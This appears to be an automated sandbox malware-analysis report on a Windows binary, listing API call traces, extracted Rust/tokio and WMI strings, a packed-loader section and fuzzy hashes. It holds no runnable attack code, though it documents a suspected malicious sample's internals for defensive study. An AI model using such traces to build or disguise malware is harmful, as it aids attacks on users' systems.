75994->75704 75995->75709 75996->75713 75997->75716 75998->75724 76000->75363 76001->75914 76004 25c1d0a GetLastError 76003->76004 76005 25c1c05 76003->76005 76013 25c1d3e 76004->76013 76006 25c1c26 QueryPerformanceFrequency 76005->76006 76012 25c1c66 76005->76012 76007 25c1c46 
76006->76007 76008 25c1d43 GetLastError 76006->76008 76007->76012 76029 25ecaf0 48 API calls 76007->76029 76008->76013 76009 25c1dd6 76009->75089 76011 25c1dc7 HeapFree 76011->76009 76012->75089 76013->76009 76013->76011 76014 25c1db6 HeapFree 76013->76014 76014->76011 76016 25c1e92 QueryPerformanceFrequency 76015->76016 76022 25c1ecf 76015->76022 76017 25c208c GetLastError 76016->76017 76018 25c1eb2 76016->76018 76019 25c20c0 76017->76019 76018->76022 76030 25ecaf0 48 API calls 76018->76030 76032 25ece40 48 API calls 76019->76032 76021 258a747 76021->75096 76021->75097 76022->76019 76022->76021 76031 25ec9a0 48 API calls 76022->76031 76034 2596952 76033->76034 76035 259692e 76033->76035 76036 257a7e0 76034->76036 76037 2596958 HeapFree 76034->76037 76035->76034 76038 2596940 HeapFree 76035->76038 76036->75115 76036->75129 76037->76036 76038->76035 76040 2561b8e 76039->76040 76051 2561ba6 76039->76051 76041 2561dc2 76040->76041 76043 25cd430 2 API calls 76040->76043 76131 25610d0 48 API calls 76041->76131 76043->76051 76044 2562153 76132 25ec900 48 API calls 76044->76132 76045 25620f4 76045->75143 76047 256215f 76048 256217e 76047->76048 76049 256216d HeapFree 76047->76049 76048->75143 76049->76048 76050 2561a50 48 API calls 76050->76051 76051->76041 76051->76044 76051->76045 76051->76050 76052 256e390 48 API calls 76051->76052 76053 256e490 48 API calls 76051->76053 76052->76051 76053->76051 76057 25c6a83 76054->76057 76055 25c6ae1 SetLastError 76055->76057 76057->76055 76058 25c6af8 GetLastError 76057->76058 76060 25c6b0a GetLastError 76057->76060 76063 25c6b37 76057->76063 76133 25f0bd0 50 API calls 76057->76133 76058->76057 76059 25c6bbe GetLastError 76058->76059 76061 25c6b70 HeapFree 76059->76061 76069 25c6b8b 76059->76069 76060->76057 76062 25c6bda 76060->76062 76061->76069 76135 25ecaf0 48 API calls 76062->76135 76065 25c6b49 76063->76065 76066 25c6c3b 76063->76066 76134 25c3580 49 API calls 76065->76134 76136 25eca90 48 API calls 76066->76136 76071 25c6c5d 
APIs
• CloseHandle.KERNEL32(?), ref: 0258632F
  • Part of subcall function 025D96A2: CoInitializeEx.OLE32 ref: 025D96B8
  • Part of subcall function 025D96A2: CoInitializeSecurity.OLE32 ref: 025D96E4
• HeapFree.KERNEL32(00000000,?), ref: 0258552A
  • Part of subcall function 0257A020: GetCommandLineW.KERNEL32 ref: 0257A05D
• HeapFree.KERNEL32(00000000,?), ref: 0258400C
• HeapFree.KERNEL32(00000000,?), ref: 025841A8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2560000_app.jbxd
Similarity
• API ID: FreeHeap$Initialize$CloseCommandHandleLineSecurity
• String ID: $Invalid$\index.crates.io-1cd66030c949c28d\base64-0.21.7\src\engine\general_purpose\decode.rs$`async fn` resumed after completion$a Display implementation returned an error unexpectedly$called `Result::unwrap()` on an `Err` value$hrzbaov$nown$ptth$ptth$rc\unicode\printable.rs
• API String ID: 4247911866-759402994
• Opcode ID: 8faa4e2ac83d390d0596349de99da3c39a4acc53fdee3df431c385f249189adc
• Instruction ID: e5e1b08113553f4f1d41d430e0ede974ece2652b22a05afa8447d3f9d02e6326
• Opcode Fuzzy Hash: 8faa4e2ac83d390d0596349de99da3c39a4acc53fdee3df431c385f249189adc
• Instruction Fuzzy Hash: 0DF29070A04782DFD725DF24C440B9AFBE1FF89304F108A1DE9999B261DB71A895CF86
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02591FCF
                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 0259200A
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000000), ref: 025922D4
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000001), ref: 02594FE3
                                                                                                                                                • Part of subcall function 025C1BB0: QueryPerformanceCounter.KERNEL32(?), ref: 025C1BF7
                                                                                                                                                • Part of subcall function 025C1BB0: QueryPerformanceFrequency.KERNEL32(00000000), ref: 025C1C38
                                                                                                                                                • Part of subcall function 025D632B: AcquireSRWLockExclusive.KERNEL32(?,00000001,00000000,?,?,025D8053,00000000,026117FC,?,?,?,?,?,?,?,?), ref: 025D6335
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000001), ref: 025924D1
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025924EE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02593146
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259559D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025955AE
                                                                                                                                              Strings
                                                                                                                                              • thread name may not contain interior null bytes, xrefs: 02595224
                                                                                                                                              • TOKIO_WORKER_THREADS/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\loom\std\mod.rs" cannot be set to 0, xrefs: 02591F5D
                                                                                                                                              • Invalid, xrefs: 02594DE9, 02595039, 02595065, 025951F2, 02595275, 025952C3, 0259540B, 02595437, 025954A5, 025954D1, 025954FD
                                                                                                                                              • attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs, xrefs: 02594E83
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 02595476, 0259551C
                                                                                                                                              • assertion failed: shared.shutdown_tx.is_some()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\pool.rs, xrefs: 025950F6
                                                                                                                                              • assertion failed: self.tail.is_none(), xrefs: 0259514B
                                                                                                                                              • assertion failed: prev.ref_count() >= 1, xrefs: 02595092
                                                                                                                                              • RUST_MIN_STACKfatal runtime error: assertion failed: thread_info.stack_guard.get().is_none() && thread_info.thread.get().is_none(), xrefs: 02592BEE
                                                                                                                                              • Failed building the Runtime, xrefs: 025951BA
                                                                                                                                              • failed to park thread, xrefs: 02595297
                                                                                                                                              • Failed to `Enter::block_on`, xrefs: 025950D6
                                                                                                                                              • driver missing, xrefs: 02595553
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$Free$AllocPerformanceQuery$AcquireAllocateCounterExclusiveFrequencyInfoLockProcessSystem
                                                                                                                                              • String ID: Failed building the Runtime$Failed to `Enter::block_on`$Invalid$RUST_MIN_STACKfatal runtime error: assertion failed: thread_info.stack_guard.get().is_none() && thread_info.thread.get().is_none()$TOKIO_WORKER_THREADS/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\loom\std\mod.rs" cannot be set to 0$assertion failed: prev.ref_count() >= 1$assertion failed: self.tail.is_none()$assertion failed: shared.shutdown_tx.is_some()/registry\src\index.crates.io-1cd66030c949c28d\tokio-1.37.0\src\runtime\blocking\pool.rs$attempt to calculate the remainder with a divisor of zero/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\core\src\slice\sort.rs$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs$driver missing$failed to park thread$thread name may not contain interior null bytes
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D9760: CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                                • Part of subcall function 025D9760: SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                                • Part of subcall function 025D9760: CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B3D3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B3EC
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B405
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0259B436
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 0259B486
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B4A6
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B4BF
                                                                                                                                              • GetModuleHandleW.KERNEL32(?), ref: 0259B660
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B678
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B68D
                                                                                                                                                • Part of subcall function 025726A3: HeapFree.KERNEL32(00000000,?), ref: 02572714
                                                                                                                                                • Part of subcall function 025726A3: HeapFree.KERNEL32(00000000,?), ref: 0257275E
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B6B2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B6D0
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0259B733
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000004), ref: 0259B764
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B77D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259B796
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259B939
                                                                                                                                              • MessageBoxW.USER32(00000000,025C0AB0,0257CDE7,00000011), ref: 0259BA3F
                                                                                                                                              • HeapFree.KERNEL32(00000000,0257CDE7,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA56
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA6F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BA9A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,00000006,00000000,?,019DB1DE,00989680,00000000,?), ref: 0259BAB3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259BCB0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259BCCA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$BlanketCreateHandleInstanceMessageModuleProxyString
                                                                                                                                              • String ID: ROOT\CIMV2$hrono-0.4.38\src\format\mod.rs
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 025D9760: CoCreateInstance.OLE32(026137A4,00000000,00000001,02613788,?,?,0259AA3A,0000000A), ref: 025D9781
                                                                                                                                                • Part of subcall function 025D9760: SysFreeString.OLEAUT32(00000000), ref: 025D97EC
                                                                                                                                                • Part of subcall function 025D9760: CoSetProxyBlanket.OLE32 ref: 025D981A
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C457
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C474
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 0259C492
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C4AE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C69F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C908
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0259C933
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A015C
                                                                                                                                                • Part of subcall function 02581BFE: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,02581E0B), ref: 02581C2B
                                                                                                                                                • Part of subcall function 025CC4E0: AcquireSRWLockExclusive.KERNEL32(02620B74), ref: 025CC566
                                                                                                                                                • Part of subcall function 025CC4E0: ReleaseSRWLockExclusive.KERNEL32(02620B74), ref: 025CC63D
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A00A2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A00E2
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025A0182
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Free$Heap$String$ExclusiveLock$AcquireAllocateBlanketCreateInstanceProcessProxyRelease
                                                                                                                                              • String ID: 66030c949c28d\base64-0.21.7\src\encode.rs$ROOT\CIMV2$WQL$called `Result::unwrap()` on an `Err` value$d to index str up to maximum usize$sing field `$wr%
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0257A05D
                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 0257A5C3
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A5D4
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A687
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257A6A1
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257A86C
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257ABDE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC68
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC7F
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AC99
                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 0257AD27
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AD94
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADAE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADC9
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257ADE0
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0257AE03
                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,025FF438,0260D02C), ref: 0257AEF1
                                                                                                                                              Strings
                                                                                                                                              • Invalid, xrefs: 0257A811
                                                                                                                                              • a Display implementation returned an error unexpectedly, xrefs: 0257AE3C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$CommandLine
                                                                                                                                              • String ID: Invalid$a Display implementation returned an error unexpectedly
                                                                                                                                              • API String ID: 10534037-4203860457
                                                                                                                                              • Opcode ID: e884e7428a15c2b9b0f53be4621f113463c89523ce64301062ce99077e4d70d3
                                                                                                                                              • Instruction ID: a830ca2d3c37a6643460c05a46cb33d156f6a91828e10267433266c0bdf43b20
                                                                                                                                              • Opcode Fuzzy Hash: e884e7428a15c2b9b0f53be4621f113463c89523ce64301062ce99077e4d70d3
                                                                                                                                              • Instruction Fuzzy Hash: 4EB226B5A40B018FD734CF29D580B6AF7E2BF98304F14892DD99A87A51EB71F885CB44
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • HeapReAlloc.KERNEL32(00000000,?,00000000), ref: 025BE914
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025BE95B
                                                                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 025BE96B
                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,?), ref: 025BE972
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025BE9D1
                                                                                                                                                • Part of subcall function 025CD430: GetProcessHeap.KERNEL32(00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?,?,0257161A,025DD2B0), ref: 025CD43F
                                                                                                                                                • Part of subcall function 025CD430: RtlAllocateHeap.NTDLL(00550000,00000000,00000014,00000000,?,025EFBF2,?,?,025BAA2A,?,?,?,?,025BA70C,?,?), ref: 025CD451
                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 025BE998
                                                                                                                                              • GetModuleHandleA.KERNEL32(api-ms-win-core-synch-l1-2-0,00000000,00000002), ref: 025BE9F7
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WaitOnAddress), ref: 025BEA09
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WakeByAddressSingle), ref: 025BEA1B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AddressFreeHandleProc$AllocAllocateCloseCreateErrorLastModuleMutexProcess
                                                                                                                                              • String ID: VUUU$WaitOnAddress$WakeByAddressSingle$api-ms-win-core-synch-l1-2-0
                                                                                                                                              • API String ID: 4042372245-3834393415
                                                                                                                                              • Opcode ID: 55d967e54e466423e095bdf805a064c658e0ace68fa4e1e75b3f517678758ec5
                                                                                                                                              • Instruction ID: d85251f158df52b97471b404b9d6a6df791d13351629f1c617f97471875697e0
                                                                                                                                              • Opcode Fuzzy Hash: 55d967e54e466423e095bdf805a064c658e0ace68fa4e1e75b3f517678758ec5
                                                                                                                                              • Instruction Fuzzy Hash: 9DC1D372E083118FD729CF18D4467AABBE5FF84314F59892DE99A87381E730D845CB89
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,000C4E00,00003000,00000004), ref: 0042C6C3
                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,?,0000001B), ref: 0042C73A
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 0042C8B1
                                                                                                                                              • GetProcAddress.KERNELBASE(?,-00000002), ref: 0042C8E1
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual$AddressLibraryLoadProc
                                                                                                                                              • String ID: 6$9+Di$Gs$M4U5$O$pfx8$s<O?(Su(
                                                                                                                                              • API String ID: 2938105391-2690861754
                                                                                                                                              • Opcode ID: 916608cc3e3ec2ceff47aa40f93238c1188128ce52c19099b677353d2d13b359
                                                                                                                                              • Instruction ID: d8249402ebe6bdfeba434c09cdb94f051b8725f3fd3e4fd9d669bd8fa7343339
                                                                                                                                              • Opcode Fuzzy Hash: 916608cc3e3ec2ceff47aa40f93238c1188128ce52c19099b677353d2d13b359
                                                                                                                                              • Instruction Fuzzy Hash: B3D16B71F012699FDB24CFA8D9807ADBBB1FF49700F6480AAD845EB341E7749941CB58
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 025803CE
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580CBB
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                                • Part of subcall function 025D04D0: TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                                • Part of subcall function 025D04D0: TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                                • Part of subcall function 025D04D0: BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                                • Part of subcall function 025D8E9F: GetProcessHeap.KERNEL32(?,Invalid,?,025D8DD0,?,?,?,?,02580204,?,000000FF,00000001,?,?), ref: 025D8EAD
                                                                                                                                                • Part of subcall function 025D8E9F: HeapAlloc.KERNEL32(00000000,00000000,?,?,Invalid,?,025D8DD0,?,?,?,?,02580204,?,000000FF,00000001,?), ref: 025D8EB7
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580F29
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 02580F6F
                                                                                                                                              Strings
                                                                                                                                              • called `Result::unwrap()` on an `Err` value, xrefs: 02581053
                                                                                                                                              • cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs, xrefs: 02581069
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$FreeValue$AllocArrayCryptDestroyProcessRandomSafe
                                                                                                                                              • String ID: called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/25ef9e3d85d934b27d9dada2f9dd52b1dc63bb04\library\std\src\thread\local.rs
                                                                                                                                              • API String ID: 3513538077-3781368868
                                                                                                                                              • Opcode ID: afab51d457147d9503c0fd98708c68e03d0c694e95e03f62fd6aae5e2d80514a
                                                                                                                                              • Instruction ID: acd36a75ad88639b3c2ccdd3db76e2e9cc147338c5d2ad10ea6ebccb2077bd76
                                                                                                                                              • Opcode Fuzzy Hash: afab51d457147d9503c0fd98708c68e03d0c694e95e03f62fd6aae5e2d80514a
                                                                                                                                              • Instruction Fuzzy Hash: 41823971A093818FD324DF28C480B6AFBE1BFC9300F15895EE999A7351E7B0D949CB56
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,025BEC80), ref: 0256EAF4
                                                                                                                                              • SetThreadStackGuarantee.KERNELBASE(00005000), ref: 0256EB0D
                                                                                                                                              • GetLastError.KERNEL32 ref: 0256EB17
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0256ED40
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 0256ED66
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,00000000), ref: 025BF223
                                                                                                                                                • Part of subcall function 025BF1B0: HeapFree.KERNEL32(00000000,?), ref: 025BF232
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap$ErrorExceptionGuaranteeHandlerLastStackThreadVectored
                                                                                                                                              • String ID: Invalid$main
                                                                                                                                              • API String ID: 679289583-3302030394
                                                                                                                                              • Opcode ID: 97822b7fcaafc0a4f896eb4d43eeb8f0d09ae419207fdca03916c603226dbb11
                                                                                                                                              • Instruction ID: 1d940196d7923b0829f377ad2e291feccd8aba3296c9933f3666481e550b35ec
                                                                                                                                              • Opcode Fuzzy Hash: 97822b7fcaafc0a4f896eb4d43eeb8f0d09ae419207fdca03916c603226dbb11
                                                                                                                                              • Instruction Fuzzy Hash: 2C7156B0D002099BEF14DFA4D989BEEBFB6FF40308F140428E515AB280E7B55588CF99
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D04E9
                                                                                                                                              • TlsGetValue.KERNEL32(00000000), ref: 025D0510
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D055E
                                                                                                                                              • BCryptGenRandom.BCRYPT(00000000,?,00000010,00000002), ref: 025D0574
                                                                                                                                                • Part of subcall function 025F0970: InitOnceBeginInitialize.KERNEL32(0262005C,00000000,00000000,00000000), ref: 025F0993
                                                                                                                                                • Part of subcall function 025F0970: TlsAlloc.KERNEL32 ref: 025F09A8
                                                                                                                                                • Part of subcall function 025F0970: InitOnceComplete.KERNEL32(0262005C,00000000,00000000), ref: 025F09D9
                                                                                                                                                • Part of subcall function 025CCE20: SystemFunction036.ADVAPI32(?,00000010), ref: 025CCE64
                                                                                                                                                • Part of subcall function 025F0970: TlsAlloc.KERNEL32 ref: 025F09E1
                                                                                                                                                • Part of subcall function 025F0970: InitOnceComplete.KERNEL32(0262005C,00000004,00000000), ref: 025F0A30
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000001), ref: 025D064A
                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 025D0659
                                                                                                                                              • TlsSetValue.KERNEL32(00000000,00000000), ref: 025D067D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$InitOnce$AllocComplete$BeginCryptFreeFunction036HeapInitializeRandomSystem
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3346809877-0
                                                                                                                                              • Opcode ID: d241ee11fc5b5ce25e57cb8d8ee48297158e9a5059d31292bd20cec522c6b448
                                                                                                                                              • Instruction ID: 44d43da4a085e82d5960fe845d2ae37c883de1e52f1ed4cd300e000a1a9d4371
                                                                                                                                              • Opcode Fuzzy Hash: d241ee11fc5b5ce25e57cb8d8ee48297158e9a5059d31292bd20cec522c6b448
                                                                                                                                              • Instruction Fuzzy Hash: B241C571A006599FE7609F68C804BBEBBA9FF44714F044918ED45D72C0D770EC84CBA9
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • GetVersionExA.KERNEL32(?,0043A478,00000060), ref: 00415DFE
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,0043A478,00000060), ref: 00415E51
                                                                                                                                              • GetCommandLineA.KERNEL32(?,0043A478,00000060), ref: 00415EE3
                                                                                                                                              • GetStartupInfoA.KERNEL32(?), ref: 00415F34
                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00415F57
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule$CommandInfoLineStartupVersion
                                                                                                                                              • String ID: `&U
                                                                                                                                              • API String ID: 2778164164-1867068525
